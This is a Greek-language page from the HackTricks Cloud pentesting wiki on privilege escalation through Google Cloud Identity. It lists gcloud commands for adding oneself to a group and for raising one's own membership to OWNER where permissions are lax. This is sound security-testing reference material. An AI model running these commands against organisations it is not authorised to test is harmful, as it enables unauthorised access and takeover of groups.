Greek - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - Cloudidentity Privesc

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον επαγγελματία με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Cloudidentity

Για περισσότερες πληροφορίες σχετικά με την υπηρεσία cloudidentity, ελέγξτε αυτήν τη σελίδα:

pageGCP - IAM, Principals & Org Policies Enum

Προσθέστε τον εαυτό σας σε μια ομάδα

Αν ο χρήστης σας έχει αρκετές άδειες ή η ομάδα έχει κακή διαμόρφωση, μπορεί να μπορεί να γίνει μέλος μιας νέας ομάδας:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Τροποποίηση μέλους ομάδας

Εάν ο χρήστης σας έχει αρκετές άδειες ή η ομάδα έχει κακή διαμόρφωση, μπορεί να καταφέρει να γίνει ΚΑΤΟΧΟΣ μιας ομάδας στην οποία είναι μέλος:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

PreviousGCP - Cloudfunctions PrivescNextGCP - Cloudscheduler Privesc

Last updated